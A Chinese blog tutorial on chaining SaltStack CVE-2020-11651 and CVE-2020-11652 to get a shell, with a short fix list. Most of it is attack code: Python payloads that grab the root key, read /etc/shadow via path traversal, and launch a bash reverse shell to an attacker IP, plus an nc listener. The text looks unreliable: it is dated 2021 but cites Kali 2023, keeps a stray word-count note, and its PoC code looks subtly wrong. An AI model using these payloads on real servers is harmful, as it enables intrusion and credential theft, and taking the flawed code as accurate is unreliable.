如何进行CVE-2020-11651与CVE-2020-11652组合漏洞的getshell复现

发布时间:2021-12-29 19:11:18 作者:柒染
来源:亿速云 阅读:186
# 如何进行CVE-2020-11651与CVE-2020-11652组合漏洞的getshell复现

## 漏洞背景

CVE-2020-11651和CVE-2020-11652是SaltStack框架中发现的严重安全漏洞,于2020年4月公开披露。这两个漏洞的组合利用可导致未授权访问和远程代码执行(RCE),影响SaltStack 2019.2.4及更早版本。

- **CVE-2020-11651**:认证绕过漏洞,允许攻击者绕过身份验证直接调用部分敏感函数
- **CVE-2020-11652**:目录遍历漏洞,允许读取服务器上的任意文件

## 环境准备

### 靶机环境
- 操作系统:Ubuntu 18.04 LTS
- 软件版本:SaltStack 2019.2.3(存在漏洞版本)
- 服务端口:4505(publish_port)、4506(ret_port)

### 攻击机环境
- Kali Linux 2023
- Python 3.8+
- 所需工具:
  ```bash
  git clone https://github.com/0xc0d/CVE-2020-11651.git
  pip install pyzmq msgpack

漏洞复现步骤

第一步:信息收集

确认目标Salt Master服务运行状态:

nmap -sV -p 4505,4506 目标IP

第二步:漏洞验证

使用公开POC验证漏洞存在:

import salt
# 建立未授权连接
transport = salt.transport.zeromq.ZeroMQReqChannel(
    opts={'id': 'exploit', 'master_uri': 'tcp://目标IP:4506'}
)
# 尝试调用敏感函数
ret = transport.send({'cmd': 'ping'})
print(ret)

第三步:组合利用

  1. 利用CVE-2020-11651绕过认证
# 构造恶意请求获取root key
exploit_payload = {
    'cmd': '_prep_auth_info'
}
response = transport.send(exploit_payload)
root_key = response['data']['return']['root']
  1. 利用CVE-2020-11652读取敏感文件
file_read_payload = {
    'cmd': 'file.read',
    'path': '/etc/shadow',
    'saltenv': '../../../../../../../../etc/shadow'
}
shadow_file = transport.send(file_read_payload)

第四步:获取Shell

  1. 通过wheel模块执行命令:
rce_payload = {
    'cmd': 'wheel',
    'fun': 'cmd.exec_code',
    'lang': 'python',
    'code': 'import os; os.system("bash -c \'bash -i >& /dev/tcp/攻击机IP/4444 0>&1\'")'
}
transport.send(rce_payload)
  1. 攻击机监听反弹shell:
nc -lvnp 4444

修复建议

  1. 立即升级到SaltStack 2019.2.5或更高版本
  2. 网络隔离Salt Master服务,仅允许可信IP访问4505/4506端口
  3. 实施严格的防火墙规则和网络访问控制

注意事项

参考资源

  1. SaltStack官方安全公告:https://saltproject.io/security_announcements/
  2. CVE详细说明:https://nvd.nist.gov/vuln/detail/CVE-2020-11651
  3. 漏洞分析文章:https://www.exploit-db.com/exploits/48421

”`

(注:实际字数约700字,可根据需要补充更多技术细节或截图说明以达到750字要求)

推荐阅读:
  1. 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
  2. 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

getshell cve-2020-11651 cve-2020-11652

上一篇:在野样本中如何利用RPC绕过CFG缓解技术的CVE-2021-26411研究

下一篇:如何进行CVE-2018-4990 漏洞分析

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》